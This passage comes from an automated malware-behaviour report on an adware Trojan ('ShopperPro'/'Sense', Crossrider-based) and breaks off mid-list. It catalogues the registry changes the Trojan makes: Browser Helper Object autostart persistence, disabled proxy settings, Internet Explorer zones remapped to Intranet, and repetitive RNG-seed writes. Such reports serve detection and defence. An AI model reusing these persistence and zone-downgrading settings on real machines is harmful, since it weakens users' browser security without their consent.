It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}]
"NoExplore" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process 9ba9693.exe:2936 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 23 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\InstalledBrowserExtensions\20891\Status]
"Installed" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\InstalledBrowserExtensions\20891]
"70299" = "SensePlus.V2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\InstalledBrowserExtensions\20891\Status]
"Installed" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "95 49 E8 5C 24 5A AF C2 90 C5 5D 67 43 06 86 68"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\InstalledBrowserExtensions\20891]
"70299" = "SensePlus.V2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"25213.bat" = "25213"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process ins_shopperpro.:540 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D8 79 0F 83 62 A2 08 D7 68 E5 16 D1 16 8F 82 2B"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process Vxsysrohsgnosa.exe:3856 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
"CrPublisherId" = "20891"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 25 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
"CrAppId" = "70299"

[HKLM\SOFTWARE\Tempo]
"(Default)" = "tempo"

[HKLM\SOFTWARE\InstalledBrowserExtensions\20891\Status]
"Installed" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\InstalledBrowserExtensions\20891\Status]
"Installed" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Crossrider]
"Verifier" = "34c14ee3961e02fd387be62f2fca6484"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\InstalledBrowserExtensions\20891]
"70299" = "Sense"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
"UninstallString" = "%Program Files%\Sense\Uninstall.exe /fcp=1"

[HKLM\SOFTWARE\Crossrider]
"Bic" = "27f49072ae5d263f87bcaf276b0be0c9IE"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
"DisplayName" = "Sense"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Crossrider]
"Bic" = "27f49072ae5d263f87bcaf276b0be0c9IE"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B3 14 20 D0 35 17 CD EB E9 3C 88 63 A6 1A 00 E9"

[HKLM\SOFTWARE\Crossrider]
"Verifier" = "34c14ee3961e02fd387be62f2fca6484"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\InstalledBrowserExtensions\20891]
"70299" = "Sense"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
"DisplayIcon" = "%Program Files%\Sense\utils.exe"

[HKCU\Software\InstalledBrowserExtensions\Sense ]
"70299" = "Sense"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
"Publisher" = "Sense "

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
"DisplayVersion" = "1.36.01.22"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Tempo]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process regsvr32.exe:3680 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\CLSID\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}\InprocServer32]
"(Default)" = "%Documents and Settings%\All Users\Application Data\ShopperPro\ShopperPro.dll"

[HKCR\Interface\{03C0AC00-86DE-4B55-81BA-2E7CD61C51B1}\TypeLib]
"(Default)" = "{8FB1A663-2820-468B-95C4-5060A4C5F413}"

[HKCR\ShopperPro.ShopperProBHO\CurVer]
"(Default)" = "ShopperPro.ShopperProBHO.1"

[HKCR\AppID\{58FDA6AF-67D8-4198-B7CD-94B17532C8D5}]
"(Default)" = "ShopperPro"

[HKCR\AppID\ShopperPro.DLL]
"AppID" = "{58FDA6AF-67D8-4198-B7CD-94B17532C8D5}"

[HKCR\ShopperPro.ShopperProBHO]
"(Default)" = "Shopper Pro"

[HKCR\ShopperPro.ShopperProBHO.1\CLSID]
"(Default)" = "{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}"

[HKCR\TypeLib\{8FB1A663-2820-468B-95C4-5060A4C5F413}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\CLSID\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}\ProgID]
"(Default)" = "ShopperPro.ShopperProBHO.1"

[HKCR\CLSID\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}]
"(Default)" = "Shopper Pro"

[HKCR\Interface\{03C0AC00-86DE-4B55-81BA-2E7CD61C51B1}\TypeLib]
"Version" = "1.0"

[HKCR\ShopperPro.ShopperProBHO\CLSID]
"(Default)" = "{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}"

[HKCR\ShopperPro.ShopperProBHO.1]
"(Default)" = "Shopper Pro"

[HKCR\TypeLib\{8FB1A663-2820-468B-95C4-5060A4C5F413}\1.0\HELPDIR]
"(Default)" = "%Documents and Settings%\All Users\Application Data\ShopperPro"

[HKCR\TypeLib\{8FB1A663-2820-468B-95C4-5060A4C5F413}\1.0]
"(Default)" = "ShopperPro 1.0 Type Library"

[HKCR\Interface\{03C0AC00-86DE-4B55-81BA-2E7CD61C51B1}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8F 02 BF A3 83 FB 38 8C CB 60 C5 3E A6 06 9C 34"

[HKCR\CLSID\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}\VersionIndependentProgID]
"(Default)" = "ShopperPro.ShopperProBHO"

[HKCR\CLSID\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\TypeLib\{8FB1A663-2820-468B-95C4-5060A4C5F413}\1.0\0\win32]
"(Default)" = "%Documents and Settings%\All Users\Application Data\ShopperPro\ShopperPro.dll"

[HKCR\CLSID\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}\TypeLib]
"(Default)" = "{8FB1A663-2820-468B-95C4-5060A4C5F413}"

[HKCR\Interface\{03C0AC00-86DE-4B55-81BA-2E7CD61C51B1}]
"(Default)" = "IShopperProBHO"

[HKCR\Interface\{03C0AC00-86DE-4B55-81BA-2E7CD61C51B1}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}]
"(Default)" = "ShopperProBHO"

"NoExplorer" = "1"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}]

The process ping.exe:4080 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E0 BE 71 0A 47 F7 FC BC E2 B0 7D 18 0C DF 10 31"

The process ping.exe:3592 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "44 00 B1 F5 8F B1 0D A6 4C 61 58 0F CF AF 64 7A"

The process ping.exe:3920 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F0 49 BF 55 80 1B 25 06 EF FD C7 0A EC C9 6A FA"

The process ping.exe:3900 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EF 32 46 96 3D F6 E5 F3 3B 87 C5 00 7B 13 B4 D1"

The process ping.exe:3776 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FF C4 C7 9A 9D B5 B7 AB 77 F5 42 CE 2B 50 97 87"

The process ping.exe:2296 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A6 AE 8B 5E DD 89 0F 09 50 76 71 47 94 4F 25 F1"

The process ping.exe:4016 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CB 7D 28 B2 1D 0D 81 05 DC 04 5E 77 CF C8 5A 37"

The process ping.exe:2472 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FD 5D 15 48 7F 42 F3 0C 50 E6 97 E1 D7 D8 D2 50"

The process ping.exe:3672 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B9 33 58 F5 53 5B 94 4B 2E 9F 6E 8D 4B A5 70 B2"

The process ping.exe:3148 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D1 ED F6 7C F8 C5 45 75 B7 E0 E4 20 BA 16 93 20"

The process ping.exe:2960 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "47 29 FD 0D C7 44 5C 14 BC 5A 49 A7 61 4E 58 53"

The process ping.exe:4008 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "98 6A D5 45 3C BE 3D E3 B9 0B F8 0E 7B 30 D6 BB"

The process ping.exe:1544 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "05 B1 DF 15 13 9E C5 F1 E4 7F B5 21 23 2C 42 8E"

The process ping.exe:1540 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "43 70 6F 48 D1 C9 05 A4 98 95 75 5E D7 EA A0 21"

The process ping.exe:3364 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3C 78 22 5C A8 E6 79 06 52 4C 1F 43 07 29 0A 2E"

The process ping.exe:3692 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C5 D9 68 DC EC F9 35 F9 E7 DD 82 B4 DD 2E 4B D3"

The process ping.exe:1652 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B7 C3 7D 99 02 93 3B 00 78 90 B1 7F 11 09 B7 39"

The process ping.exe:548 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "36 2F 53 DE 07 60 51 C4 EB F5 1D E2 65 B1 19 4B"

The process ping.exe:2240 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F1 E7 81 1D 8E C0 B4 A4 31 41 A2 20 FB 06 BC DB"

The process ping.exe:4044 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DC A0 4C 36 63 88 11 D8 0D 4D C3 AD D4 B7 74 7C"

The process ping.exe:3452 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7A 68 C4 8A F3 8C 1C 1B 07 79 6A 4F FC BD 0A F2"

The process ping.exe:3600 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "53 7C ED 32 21 72 00 70 3B 72 17 43 D9 2C 6A E4"

The process ping.exe:2460 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "69 59 B5 C4 DD 57 D0 77 B7 B0 A3 CC 8C 8B 18 83"

The process ping.exe:3912 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "81 90 56 37 13 82 DD F5 CB 8D 9F A5 E2 C5 3B 6C"

The process ping.exe:2284 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "64 BE 8E 03 73 87 74 16 4F 4B 32 3D D1 3C 90 D2"

The process ping.exe:3136 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AC 8B 26 91 6B 2E E1 F9 DC 4B 3B 55 29 14 F1 F8"

The process ping.exe:4036 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "91 AB 34 15 F1 8A D1 B5 F4 C6 36 84 56 A4 67 7F"

The process ping.exe:2972 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "89 75 8C DF AC C5 C7 8B 1F DA 01 FA FC 49 2E B4"

The process ping.exe:3312 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E2 68 3E AC 06 91 F0 7E 53 EA F6 84 5B 41 FF 7A"

The process ping.exe:3884 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "13 83 B9 F1 1A A5 09 A8 66 41 B0 77 A4 21 C7 60"

The process ping.exe:3784 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "13 00 11 F3 37 30 B7 7B ED 78 C0 E4 1D 7D 38 EA"

The process ping.exe:3460 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E5 26 79 C3 DA 86 A8 AD B7 DB E5 6F B6 9E B0 8B"

The process ping.exe:2232 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "10 6B 70 A1 23 B3 EF 0F A3 0A 26 5D D8 52 04 C7"

The process ping.exe:3372 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A4 E4 E5 A5 12 C4 5E 70 D2 AB 56 DA 8C B9 C8 1C"

The process ping.exe:4072 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "65 7D 09 EF CC D1 22 93 FC 27 36 ED B4 14 49 65"

The process net.exe:3368 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Templates" = "%Documents and Settings%\All Users\Templates"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8A FC 75 4D D9 B9 31 0C 2A 98 44 38 FC 5B 2B CE"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"Favorites" = "%Documents and Settings%\%current user%\Favorites"

The process net.exe:2624 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
